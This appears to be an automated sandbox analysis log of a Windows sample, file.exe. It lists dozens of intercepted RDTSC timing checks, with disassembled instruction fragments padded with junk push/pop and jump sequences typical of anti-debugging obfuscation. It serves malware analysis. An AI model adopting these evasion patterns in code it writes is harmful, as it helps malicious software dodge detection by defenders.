                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B725 second address: E2B729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B729 second address: E2B76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jmp 00007F66B1272F5Bh 0x0000001e js 00007F66B1272F56h 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F66B1272F60h 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B76C second address: E2B786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FB5h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B786 second address: E2B791 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F66B1272F56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B8FD second address: E2B937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F66B07B4FB6h 0x0000000c push edx 0x0000000d jmp 00007F66B07B4FB7h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2BD7E second address: E2BD84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C1C8 second address: E2C1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FB2h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007F66B07B4FA6h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C36D second address: E2C3A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F66B1272F5Eh 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F66B1272F5Ch 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C3A0 second address: E2C3A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C4D1 second address: E2C4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C4D7 second address: E2C4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FAFh 0x00000009 popad 0x0000000a jng 00007F66B07B4FB2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C4F3 second address: E2C4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF122 second address: DDF126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF126 second address: DDF12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF12F second address: DDF135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE05A second address: DAE06D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE06D second address: DAE07B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F66B07B4FACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE07B second address: DAE083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C979 second address: E2C9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FABh 0x00000009 jmp 00007F66B07B4FB8h 0x0000000e popad 0x0000000f jo 00007F66B07B4FBAh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B197 second address: E2B19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B19B second address: E2B19F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B19F second address: E2B1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E32679 second address: E32680 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E32680 second address: E3268A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E31951 second address: E31957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E31957 second address: E3195D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3195D second address: E31961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFC31B second address: DFC31F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E31D4B second address: E31D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FB0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E31D5F second address: E31D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E31D6B second address: E31D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F66B07B4FB4h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E39251 second address: E3926E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F66B1272F5Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3926E second address: E3928D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B07B4FB1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F66B07B4FA6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3928D second address: E392A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F62h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F02F second address: E3F053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F66B07B4FB4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F66B07B4FAAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F053 second address: E3F058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F058 second address: E3F05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4498 second address: DDE574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F66B1272F56h 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1CF0h], edx 0x00000012 call dword ptr [ebp+122D1822h] 0x00000018 jnp 00007F66B1272F82h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4531 second address: DF454B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66B07B4FB6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF454B second address: DF4570 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b jmp 00007F66B1272F68h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4619 second address: DF461F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF461F second address: DF4642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jg 00007F66B1272F56h 0x00000011 jmp 00007F66B1272F5Eh 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4AFF second address: DF4B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4C37 second address: DF4C46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4CEE second address: DF4D22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnc 00007F66B07B4FA6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 jns 00007F66B07B4FA6h 0x00000019 popad 0x0000001a jmp 00007F66B07B4FB1h 0x0000001f popad 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 push ecx 0x00000025 push esi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4D22 second address: DF4D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F66B1272F58h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4D34 second address: DF4D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66B07B4FB7h 0x00000008 jbe 00007F66B07B4FA6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4D61 second address: DF4D65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4D65 second address: DF4D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4E25 second address: DF4E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4E35 second address: DF4E3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4FC7 second address: DF4FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF537A second address: DF537F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF537F second address: DF53E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F66B1272F64h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop esi 0x00000014 nop 0x00000015 mov cx, bx 0x00000018 push 0000001Eh 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F66B1272F58h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov edx, dword ptr [ebp+122D2E9Ah] 0x0000003a nop 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F66B1272F66h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5598 second address: DF559E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5820 second address: DDF122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jno 00007F66B1272F74h 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D1F8Eh], eax 0x00000018 call dword ptr [ebp+122D1FBFh] 0x0000001e pushad 0x0000001f jmp 00007F66B1272F5Fh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F66B1272F65h 0x0000002b js 00007F66B1272F56h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3E15B second address: E3E167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3E167 second address: E3E189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F66B1272F65h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3E189 second address: E3E18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3E5AB second address: E3E5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F66B1272F68h 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F66B1272F60h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3E5CB second address: E3E5D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007F66B07B4FA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3E8CB second address: E3E8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B1272F61h 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4206B second address: E42071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42071 second address: E420A1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F66B1272F56h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F66B1272F69h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jc 00007F66B1272F8Bh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E420A1 second address: E420C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FB9h 0x00000009 jo 00007F66B07B4FA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E43FD1 second address: E43FEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F66B1272F56h 0x0000000a jmp 00007F66B1272F61h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E43FEC second address: E43FF2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E48EDE second address: E48EE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E48603 second address: E48607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E48786 second address: E4878C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EAC1 second address: E4EAD1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F66B07B4FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EAD1 second address: E4EAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EAD9 second address: E4EADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EADF second address: E4EAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EAE5 second address: E4EAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EAEA second address: E4EAFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F60h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D2FC second address: E4D30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F66B07B4FA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D30A second address: E4D32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F66B1272F69h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D32E second address: E4D334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4AF second address: E4D4B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4B5 second address: E4D4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4B9 second address: E4D4BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4BF second address: E4D4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jng 00007F66B07B4FA6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 jp 00007F66B07B4FA6h 0x00000019 jmp 00007F66B07B4FB5h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4EF second address: E4D4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4F9 second address: E4D4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4FF second address: E4D50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D682 second address: E4D686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D686 second address: E4D6B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F63h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F66B1272F61h 0x00000011 jmp 00007F66B1272F5Bh 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D6B3 second address: E4D6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F66B07B4FB6h 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jng 00007F66B07B4FA6h 0x00000016 pop esi 0x00000017 pushad 0x00000018 jmp 00007F66B07B4FABh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D6E9 second address: E4D6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D6F0 second address: E4D6F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D98D second address: E4D994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
